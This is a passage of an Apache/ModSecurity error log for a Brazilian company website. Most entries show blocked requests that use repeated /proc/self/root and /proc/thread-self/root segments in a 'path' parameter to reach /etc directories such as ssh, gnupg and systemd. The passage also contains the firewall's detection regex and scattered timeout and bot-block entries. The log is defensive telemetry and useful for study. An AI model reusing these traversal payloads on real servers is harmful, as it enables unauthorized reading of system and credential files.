"absGYP-YZRR_7pZ7nDIuwgAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:08.882974 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.241.31:54724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGZP-YZRR_7pZ7nDIuxQAAA9g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:10.125836 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33844] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:09:21.219400 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:56356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGceoXxyEfFpUF8f-z9gAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:25.894023 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:58506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGdQkwaGbbGflqUZBQsQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:38.724763 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.241.31:34016] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGgkzinOy1jxa1j4dbxQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:09:44.120326 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34404] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:09:56.463122 2026] [:error] [pid 23798:tid 140411699963648] [client 74.7.243.128:60684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGlD-9rzzdA3Ti0NCOngAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 17:09:59.785492 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.77:35910] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:10:18.342210 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:33006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGqta6ubjKNq_cu4bbgQAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:10:19.169827 2026] [proxy_fcgi:error] [pid 23798:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35048] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:10:35.583946 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:60576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGuwkwaGbbGflqUZBQxAAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:10:47.932971 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:51832] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absGx9a6ubjKNq_cu4bbjQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:10:48.120950 2026] [proxy_fcgi:error] [pid 14269:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35542] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:11:00.297572 2026] [core:alert] [pid 15826:tid 140411666392832] [client 57.141.18.35:36512] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:11:08.475884 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.244.43:40430] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absG3Pu8EFLIOrSqIps9zgAAAkY"]
[Wed Mar 18 17:11:14.023758 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:48374] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absG4uyqAr6etmhZHNoH8wAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:11:14.503894 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.228.61:40708] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absG4kzinOy1jxa1j4db5gAAAQ4"]
[Wed Mar 18 17:11:25.057865 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36248] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:11:30.727465 2026] [mime_magic:error] [pid 31803:tid 140411666392832] (70014)End of file found: [client 57.141.18.0:36730] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:11:46.987370 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:54688] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHAta6ubjKNq_cu4bbngAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:11:55.791470 2026] [mime_magic:error] [pid 17887:tid 140411716749056] (70014)End of file found: [client 57.141.18.1:37920] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:11:58.127636 2026] [proxy_fcgi:error] [pid 9800:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36974] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:12:05.676375 2026] [mime_magic:error] [pid 26799:tid 140411632822016] (70014)End of file found: [client 57.141.18.7:38064] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:12:22.129894 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37466] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:12:46.129840 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:37996] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:13:00.468880 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:33472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHTOw_le52K8_3pV0aUAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:09.102891 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:38492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:13:12.111498 2026] [:error] [pid 23798:tid 140411616036608] [client 74.7.241.31:47944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHWD-9rzzdA3Ti0NCO2gAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:30.875912 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:56286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHaimAPhZkrhU8w4mofwAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:31.129809 2026] [proxy_fcgi:error] [pid 11816:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38978] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:13:36.809835 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:59824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHcOoXxyEfFpUF8f-0SQAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:39.433312 2026] [core:alert] [pid 14269:tid 140411632822016] [client 216.73.216.191:25005] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 17:13:40.976850 2026] [:error] [pid 9333:tid 140411574073088] [client 74.7.241.31:42648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHdA_eYRmh974Uj6QBkQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:44.544424 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:42664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHeOyqAr6etmhZHNoILAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 17:13:51.307126 2026] [:error] [pid 9333:tid 140411641214720] [client 74.7.243.128:38710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHfw_eYRmh974Uj6QBkwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 17:13:52.861069 2026] [mime_magic:error] [pid 30077:tid 140411725141760] (70014)End of file found: [client 57.141.18.5:40178] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 17:13:54.881823 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39476] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 17:13:55.638135 2026] [:error] [pid 9800:tid 140411590858496] [client 74.7.241.31:42670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absHg4JpNEVVDhwB8vODMwAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
